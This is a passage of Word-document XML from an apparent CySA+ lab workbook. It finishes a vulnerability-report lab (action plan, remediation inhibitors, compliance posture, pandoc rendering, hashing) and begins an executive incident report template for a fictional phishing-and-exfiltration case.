        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 5 | CVE-2022-1111 | jump01 | 6.5 | No | P3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Action plan</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 | Action | Owner | Due | Type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1 | Patch nginx 1.18 → 1.26 on web01 | Platform | 2026-05-15 | Patching |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 2 | Investigate db01 patch reversion; freeze config drift | DBA + Change | 2026-05-17 | Configuration management |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 3 | Compensating control on legacy01: WAF rule + segmentation | NetOps | 2026-05-20 | Compensating control |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 4 | Refresh OpenSSH on jump01 next maintenance window | Platform | 2026-05-31 | Patching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Inhibitors to remediation (CySA+ 4.1)</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Inhibitor | Affected item | Mitigation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MOU with partner pins legacy01 to IIS 7.5 | #2 | WAF + segmentation, document risk acceptance |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| SLA window only allows monthly DB patching | #2 | Move db01 to weekly patch cadence |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Business process interruption risk on web01 | #1 | Schedule blue-green deploy |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Legacy system (IIS 7.5) | #2 | Plan retirement Q3 2026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Compliance posture</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**PCI DSS 11.3** quarterly external scan: PASS, last run 2026-05-05.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **ISO 27001 A.12.6** technical vulnerability management: documented, evidence in this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- **Internal SLA**: P1 = 7 d, P2 = 30 d, P3 = 90 d.</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Stakeholders</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Stakeholder | Interest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CISO | Risk score trend, KEV exposure |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Engineering leads | Action items, owners, due dates |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Audit | Compliance posture, evidence pointers |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Business owners | Inhibitors, accepted risks |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Render to HTML and (optionally) PDF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pandoc report.md -s -o report.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -lh report.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># pandoc report.md -o report.pdf      # uncomment if TeX is installed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open report.html in a browser to verify formatting before mailing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Hash and archive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum report.md report.html prioritised.csv &gt; MANIFEST.sha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -lh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reports are evidence; hashes prove integrity (and the auditor will check).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Map every section to a CySA+ 4.1 bullet</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CySA+ 4.1 bullet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KPI table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Metrics and KPIs (Trends, Top 10, SLOs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Action plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Action plans (Configuration management, Patching)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Inhibitors table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Inhibitors to remediation (MOU, SLA, Org governance, Business process interruption, Legacy systems)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Compliance posture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Compliance reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stakeholder identification and communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recurrence row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recurrence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Prioritise vulnerabilities with KEV + CVSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Author a stakeholder-grade vulnerability report with executive summary, Top 10, action plan, inhibitors, and compliance posture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Render Markdown to HTML/PDF with pandoc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Map every section back to the CySA+ 4.1 exam blueprint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to prioritise vulnerabilities with KEV + CVSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 27 — Executive Incident Report</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write the executive incident report from the scenario walked in Labs 20, 23, 24.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will write the executive incident report from the scenario walked in Labs 20, 23, 24. It will satisfy every CySA+ 4.2 bullet: executive summary, Who-What-When-Where-Why, recommendations, timeline, impact, scope, evidence, communications, root cause, lessons learned, metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Most of this lab is writing — no shell required. The output is a single Markdown file rendered with pandoc.</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y pandoc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab27 &amp;&amp; cd /tmp/lab27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Use the canonical IR report template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; incident_report.md &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Incident Report — CASE-001 (Finance Department Phishing → Data Exfiltration)</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**Classification:** Internal — Confidential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Date:** 2026-05-13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Author:** SOC Lead Analyst</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Approver:** CISO</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1. Executive summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>On 2026-05-13 at 08:00 UTC, a member of the Finance team opened a phishing email impersonating PayPal. The macro-laden attachment delivered a PowerShell downloader that established command-and-control with `185.220.101.45`. Within 10 minutes the attacker authenticated to the internal file share via stolen credentials and exfiltrated approximately **1 GB of data over HTTPS**. The compromised user account was disabled at 08:30, the host isolated at 08:45, and the second-stage payload eradicated by 11:00. There is **no evidence of further lateral movement**. Containment held.</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2. Who, what, when, where, why</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Field | Value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**Who**  | Single Finance user (badge #FN-104); attacker IP 185.220.101.45 (TOR exit, Russia geo-tag) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **What** | Phishing → macro → PowerShell downloader → credential theft → 1 GB exfil |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **When** | 2026-05-13 08:00 → 11:00 UTC (3 h to full eradication) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **Where**| Workstation `FN-WS-014` and File Server `FS01` |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| **Why**  | Macro execution was permitted by GPO; user not on phishing-resistant MFA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3. Timeline (UTC)</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Time     | Event                                                  | Evidence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08:00    | Phishing email delivered, opened                       | mail-gw, Lab 8      |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| 08:01    | Macro spawns PowerShell, downloads stage 2             | EDR alert           |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
